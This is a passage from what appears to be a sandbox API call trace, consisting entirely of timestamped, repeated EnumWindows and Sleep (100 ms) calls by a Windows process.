lParam=0x540000) [0135.434] Sleep (dwMilliseconds=0x64) [0135.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.448] Sleep (dwMilliseconds=0x64) [0135.467] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.468] Sleep (dwMilliseconds=0x64) [0135.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.483] Sleep (dwMilliseconds=0x64) [0135.499] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.499] Sleep (dwMilliseconds=0x64) [0135.515] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.515] Sleep (dwMilliseconds=0x64) [0135.576] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.577] Sleep (dwMilliseconds=0x64) [0135.638] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.638] Sleep (dwMilliseconds=0x64) [0135.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.654] Sleep (dwMilliseconds=0x64) [0135.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.667] Sleep (dwMilliseconds=0x64) [0135.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.683] Sleep (dwMilliseconds=0x64) [0135.699] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.699] Sleep (dwMilliseconds=0x64) [0135.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.716] Sleep (dwMilliseconds=0x64) [0135.765] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.765] Sleep (dwMilliseconds=0x64) [0135.822] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.822] Sleep (dwMilliseconds=0x64) [0135.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.917] Sleep (dwMilliseconds=0x64) [0135.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.968] Sleep (dwMilliseconds=0x64) [0136.058] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.058] Sleep (dwMilliseconds=0x64) [0136.122] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.125] Sleep (dwMilliseconds=0x64) [0136.153] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.153] Sleep (dwMilliseconds=0x64) [0136.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.170] Sleep (dwMilliseconds=0x64) [0136.231] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.231] Sleep (dwMilliseconds=0x64) [0136.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.327] Sleep (dwMilliseconds=0x64) [0136.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0136.545] Sleep (dwMilliseconds=0x64) [0137.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.014] Sleep (dwMilliseconds=0x64) [0137.108] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.108] Sleep (dwMilliseconds=0x64) [0137.210] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.210] Sleep (dwMilliseconds=0x64) [0137.302] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.303] Sleep (dwMilliseconds=0x64) [0137.562] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.563] Sleep (dwMilliseconds=0x64) [0137.722] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.722] Sleep (dwMilliseconds=0x64) [0137.802] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.802] Sleep (dwMilliseconds=0x64) [0137.883] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0137.883] Sleep (dwMilliseconds=0x64) [0138.022] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.022] Sleep (dwMilliseconds=0x64) [0138.166] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.173] Sleep (dwMilliseconds=0x64) [0138.451] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.451] Sleep (dwMilliseconds=0x64) [0138.612] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.612] Sleep (dwMilliseconds=0x64) [0138.776] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.777] Sleep (dwMilliseconds=0x64) [0138.907] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.908] Sleep (dwMilliseconds=0x64) [0138.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0138.995] Sleep (dwMilliseconds=0x64) [0139.051] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.052] Sleep (dwMilliseconds=0x64) [0139.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.121] Sleep (dwMilliseconds=0x64) [0139.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.217] Sleep (dwMilliseconds=0x64) [0139.288] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.288] Sleep (dwMilliseconds=0x64) [0139.378] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.378] Sleep (dwMilliseconds=0x64) [0139.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.448] Sleep (dwMilliseconds=0x64) [0139.799] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.800] Sleep (dwMilliseconds=0x64) [0139.919] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.919] Sleep (dwMilliseconds=0x64) [0139.965] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0139.966] Sleep (dwMilliseconds=0x64) [0140.018] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.018] Sleep (dwMilliseconds=0x64) [0140.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.107] Sleep (dwMilliseconds=0x64) [0140.328] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.329] Sleep (dwMilliseconds=0x64) [0140.450] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.451] Sleep (dwMilliseconds=0x64) [0140.517] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.517] Sleep (dwMilliseconds=0x64) [0140.652] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.672] Sleep (dwMilliseconds=0x64) [0140.779] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.780] Sleep (dwMilliseconds=0x64) [0140.867] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.867] Sleep (dwMilliseconds=0x64) [0140.956] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0140.956] Sleep (dwMilliseconds=0x64) [0140.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.027] Sleep (dwMilliseconds=0x64) [0141.137] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.137] Sleep (dwMilliseconds=0x64) [0141.427] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.427] Sleep (dwMilliseconds=0x64) [0141.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.495] Sleep (dwMilliseconds=0x64) [0141.595] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.595] Sleep (dwMilliseconds=0x64) [0141.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.683] Sleep (dwMilliseconds=0x64) [0141.750] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.750] Sleep (dwMilliseconds=0x64) [0141.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.796] Sleep (dwMilliseconds=0x64) [0141.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.808] Sleep (dwMilliseconds=0x64) [0141.840] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.840] Sleep (dwMilliseconds=0x64) [0141.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.854] Sleep (dwMilliseconds=0x64) [0141.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.870] Sleep (dwMilliseconds=0x64) [0141.885] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.886] Sleep (dwMilliseconds=0x64) [0141.902] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.902] Sleep (dwMilliseconds=0x64) [0141.979] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0141.980] Sleep (dwMilliseconds=0x64) [0142.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.114] Sleep (dwMilliseconds=0x64) [0142.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.120] Sleep (dwMilliseconds=0x64) [0142.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.137] Sleep (dwMilliseconds=0x64) [0142.152] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.152] Sleep (dwMilliseconds=0x64) [0142.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.167] Sleep (dwMilliseconds=0x64) [0142.182] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.182] Sleep (dwMilliseconds=0x64) [0142.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.201] Sleep (dwMilliseconds=0x64) [0142.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.214] Sleep (dwMilliseconds=0x64) [0142.229] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.229] Sleep (dwMilliseconds=0x64) [0142.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.245] Sleep (dwMilliseconds=0x64) [0142.260] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.261] Sleep (dwMilliseconds=0x64) [0142.278] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.278] Sleep (dwMilliseconds=0x64) [0142.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.292] Sleep (dwMilliseconds=0x64) [0142.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.307] Sleep (dwMilliseconds=0x64) [0142.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.323] Sleep (dwMilliseconds=0x64) [0142.338] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.339] Sleep (dwMilliseconds=0x64) [0142.358] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.358] Sleep (dwMilliseconds=0x64) [0142.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.370] Sleep (dwMilliseconds=0x64) [0142.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.388] Sleep (dwMilliseconds=0x64) [0142.453] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.453] Sleep (dwMilliseconds=0x64) [0142.466] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.467] Sleep (dwMilliseconds=0x64) [0142.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.480] Sleep (dwMilliseconds=0x64) [0142.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.496] Sleep (dwMilliseconds=0x64) [0142.510] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.511] Sleep (dwMilliseconds=0x64) [0142.526] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.526] Sleep (dwMilliseconds=0x64) [0142.542] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.542] Sleep (dwMilliseconds=0x64) [0142.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.560] Sleep (dwMilliseconds=0x64) [0142.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.573] Sleep (dwMilliseconds=0x64) [0142.664] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.664] Sleep (dwMilliseconds=0x64) [0142.700] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.700] Sleep (dwMilliseconds=0x64) [0142.746] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.746] Sleep (dwMilliseconds=0x64) [0142.794] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.794] Sleep (dwMilliseconds=0x64) [0142.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.870] Sleep (dwMilliseconds=0x64) [0142.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0142.965] Sleep (dwMilliseconds=0x64) [0143.018] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.019] Sleep (dwMilliseconds=0x64) [0143.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.027] Sleep (dwMilliseconds=0x64) [0143.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.042] Sleep (dwMilliseconds=0x64) [0143.081] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.082] Sleep (dwMilliseconds=0x64) [0143.124] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.158] Sleep (dwMilliseconds=0x64) [0143.175] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.175] Sleep (dwMilliseconds=0x64) [0143.182] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.183] Sleep (dwMilliseconds=0x64) [0143.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.201] Sleep (dwMilliseconds=0x64) [0143.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.215] Sleep (dwMilliseconds=0x64) [0143.229] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.230] Sleep (dwMilliseconds=0x64) [0143.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.245] Sleep (dwMilliseconds=0x64) [0143.260] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.261] Sleep (dwMilliseconds=0x64) [0143.276] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.276] Sleep (dwMilliseconds=0x64) [0143.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.292] Sleep (dwMilliseconds=0x64) [0143.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.308] Sleep (dwMilliseconds=0x64) [0143.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.327] Sleep (dwMilliseconds=0x64) [0143.340] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.340] Sleep (dwMilliseconds=0x64) [0143.354] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.354] Sleep (dwMilliseconds=0x64) [0143.372] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.373] Sleep (dwMilliseconds=0x64) [0143.385] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.386] Sleep (dwMilliseconds=0x64) [0143.401] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.406] Sleep (dwMilliseconds=0x64) [0143.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.417] Sleep (dwMilliseconds=0x64) [0143.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.433] Sleep (dwMilliseconds=0x64) [0143.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.448] Sleep (dwMilliseconds=0x64) [0143.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.464] Sleep (dwMilliseconds=0x64) [0143.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.482] Sleep (dwMilliseconds=0x64) [0143.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.495] Sleep (dwMilliseconds=0x64) [0143.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.514] Sleep (dwMilliseconds=0x64) [0143.530] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.530] Sleep (dwMilliseconds=0x64) [0143.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.545] Sleep (dwMilliseconds=0x64) [0143.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.561] Sleep (dwMilliseconds=0x64) [0143.576] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.577] Sleep (dwMilliseconds=0x64) [0143.606] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.606] Sleep (dwMilliseconds=0x64) [0143.622] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.622] Sleep (dwMilliseconds=0x64) [0143.639] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.640] Sleep (dwMilliseconds=0x64) [0143.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.730] Sleep (dwMilliseconds=0x64) [0143.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.886] Sleep (dwMilliseconds=0x64) [0143.952] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.953] Sleep (dwMilliseconds=0x64) [0143.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0143.996] Sleep (dwMilliseconds=0x64) [0144.091] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.092] Sleep (dwMilliseconds=0x64) [0144.180] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.180] Sleep (dwMilliseconds=0x64) [0144.274] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.274] Sleep (dwMilliseconds=0x64) [0144.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.327] Sleep (dwMilliseconds=0x64) [0144.373] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.373] Sleep (dwMilliseconds=0x64) [0144.419] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.419] Sleep (dwMilliseconds=0x64) [0144.498] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.498] Sleep (dwMilliseconds=0x64) [0144.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.573] Sleep (dwMilliseconds=0x64) [0144.638] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.639] Sleep (dwMilliseconds=0x64) [0144.683] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.683] Sleep (dwMilliseconds=0x64) [0144.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0144.964] Sleep (dwMilliseconds=0x64) [0145.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.074] Sleep (dwMilliseconds=0x64) [0145.200] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.200] Sleep (dwMilliseconds=0x64) [0145.465] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.465] Sleep (dwMilliseconds=0x64) [0145.544] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.544] Sleep (dwMilliseconds=0x64) [0145.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.667] Sleep (dwMilliseconds=0x64) [0145.793] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.793] Sleep (dwMilliseconds=0x64) [0145.937] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0145.937] Sleep (dwMilliseconds=0x64) [0146.048] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.049] Sleep (dwMilliseconds=0x64) [0146.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.139] Sleep (dwMilliseconds=0x64) [0146.249] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.250] Sleep (dwMilliseconds=0x64) [0146.341] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.342] Sleep (dwMilliseconds=0x64) [0146.409] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.409] Sleep (dwMilliseconds=0x64) [0146.450] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.451] Sleep (dwMilliseconds=0x64) [0146.497] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.497] Sleep (dwMilliseconds=0x64) [0146.581] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.582] Sleep (dwMilliseconds=0x64) [0146.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.680] Sleep (dwMilliseconds=0x64) [0146.734] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.735] Sleep (dwMilliseconds=0x64) [0146.778] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.779] Sleep (dwMilliseconds=0x64) [0146.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.823] Sleep (dwMilliseconds=0x64) [0146.943] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0146.946] Sleep (dwMilliseconds=0x64) [0147.037] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.040] Sleep (dwMilliseconds=0x64) [0147.094] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.094] Sleep (dwMilliseconds=0x64) [0147.138] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.139] Sleep (dwMilliseconds=0x64) [0147.401] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.401] Sleep (dwMilliseconds=0x64) [0147.498] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.499] Sleep (dwMilliseconds=0x64) [0147.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.545] Sleep (dwMilliseconds=0x64) [0147.608] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.608] Sleep (dwMilliseconds=0x64) [0147.655] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.655] Sleep (dwMilliseconds=0x64) [0147.695] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.695] Sleep (dwMilliseconds=0x64) [0147.743] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.744] Sleep (dwMilliseconds=0x64) [0147.772] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.772] Sleep (dwMilliseconds=0x64) [0147.780] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.780] Sleep (dwMilliseconds=0x64) [0147.954] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0147.955] Sleep (dwMilliseconds=0x64) [0148.646] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.775] Sleep (dwMilliseconds=0x64) [0148.793] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.793] Sleep (dwMilliseconds=0x64) [0148.816] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.816] Sleep (dwMilliseconds=0x64) [0148.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.823] Sleep (dwMilliseconds=0x64) [0148.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.843] Sleep (dwMilliseconds=0x64) [0148.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.858] Sleep (dwMilliseconds=0x64) [0148.872] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.873] Sleep (dwMilliseconds=0x64) [0148.933] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.936] Sleep (dwMilliseconds=0x64) [0148.983] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0148.983] Sleep (dwMilliseconds=0x64) [0149.063] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.063] Sleep (dwMilliseconds=0x64) [0149.104] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.105] Sleep (dwMilliseconds=0x64) [0149.246] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.247] Sleep (dwMilliseconds=0x64) [0149.318] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.318] Sleep (dwMilliseconds=0x64) [0149.362] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.362] Sleep (dwMilliseconds=0x64) [0149.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.370] Sleep (dwMilliseconds=0x64) [0149.385] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.386] Sleep (dwMilliseconds=0x64) [0149.402] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.402] Sleep (dwMilliseconds=0x64) [0149.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.417] Sleep (dwMilliseconds=0x64) [0149.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.432] Sleep (dwMilliseconds=0x64) [0149.450] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.450] Sleep (dwMilliseconds=0x64) [0149.512] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.513] Sleep (dwMilliseconds=0x64) [0149.541] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.542] Sleep (dwMilliseconds=0x64) [0149.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.558] Sleep (dwMilliseconds=0x64) [0149.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.574] Sleep (dwMilliseconds=0x64) [0149.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.589] Sleep (dwMilliseconds=0x64) [0149.604] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.605] Sleep (dwMilliseconds=0x64) [0149.648] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.649] Sleep (dwMilliseconds=0x64) [0149.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.651] Sleep (dwMilliseconds=0x64) [0149.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.698] Sleep (dwMilliseconds=0x64) [0149.726] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.726] Sleep (dwMilliseconds=0x64) [0149.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.729] Sleep (dwMilliseconds=0x64) [0149.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.745] Sleep (dwMilliseconds=0x64) [0149.761] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.761] Sleep (dwMilliseconds=0x64) [0149.776] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.776] Sleep (dwMilliseconds=0x64) [0149.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.792] Sleep (dwMilliseconds=0x64) [0149.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.808] Sleep (dwMilliseconds=0x64) [0149.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.823] Sleep (dwMilliseconds=0x64) [0149.885] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.886] Sleep (dwMilliseconds=0x64) [0149.919] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.919] Sleep (dwMilliseconds=0x64) [0149.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.933] Sleep (dwMilliseconds=0x64) [0149.948] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.949] Sleep (dwMilliseconds=0x64) [0149.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.964] Sleep (dwMilliseconds=0x64) [0149.980] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.981] Sleep (dwMilliseconds=0x64) [0149.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0149.995] Sleep (dwMilliseconds=0x64) [0150.012] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.012] Sleep (dwMilliseconds=0x64) [0150.074] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.074] Sleep 